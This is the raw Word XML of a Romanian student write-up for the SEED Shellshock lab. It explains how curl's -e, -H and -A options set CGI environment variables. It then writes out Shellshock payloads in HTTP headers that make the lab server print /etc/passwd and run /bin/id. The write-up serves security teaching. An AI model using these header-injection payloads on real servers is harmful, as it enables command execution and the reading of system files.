        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>e  -&gt;  specifica o adresa URL pentru a fi folosită ca referință în antetul "Referer" al cererii HTTP (indică pagina web de pe care a fost inițiată cererea curentă)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>birlutiuclaudiu</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">" -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>546735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4928870" cy="10115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928870" cy="101155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2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>H -&gt; va permite să se specifice un antet suplimentar HTTP pentru cererea HTTP (pot include informații despre ce tip de continut avem sau chair date de autentificare)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Authorization: Bearer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>dadasdasdasdasdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">" -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
        </w:r>
      </w:hyperlink>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4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-129540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="11023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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="110236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t xml:space="preserve">Am combinat toate aceste optinui într-o singura comanda și am observat ca am modificat variabilele de mediu din cadrul procesului deschis în bash astfel: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -A "BirlutiuAgent" -e "www.birlutiu.com" -H "STRING: ATAC" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-142875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="41833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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4183380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">observam cum putem injecat variabile de mediu sau ale modifica în cardul procesului curent cu ajutorul optiunilor date, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>mai ales prin optiunea -H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>astfel, având puterea de aseta niște variabile noi pentru proces, putem sa includem o declarare de funcție urmata de codul de atac prin care putem obtine acces la resursele dorite</w:t>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Heading2"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>Sarcina 3: Lansarea atacului Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Sarcina 3.A. Trimiterea fișierului </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne vom folosi de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>optiunea -A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lui curl in felul urmator: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) { echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etc/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>comanda întreaga:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -A "() { echo salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>/bin/cat /etc/passwd" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>in ruma executiei comenzii vom obtine conturile de utuilizator existente pe server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-110490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="41719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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4171950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>ID-ul de utilizator al procesului server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne vom folosi de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>optiunea -e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> a lui curl in felul urmator: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-REFFERER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) { echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>comanda întreaga:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -e "() { echo salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
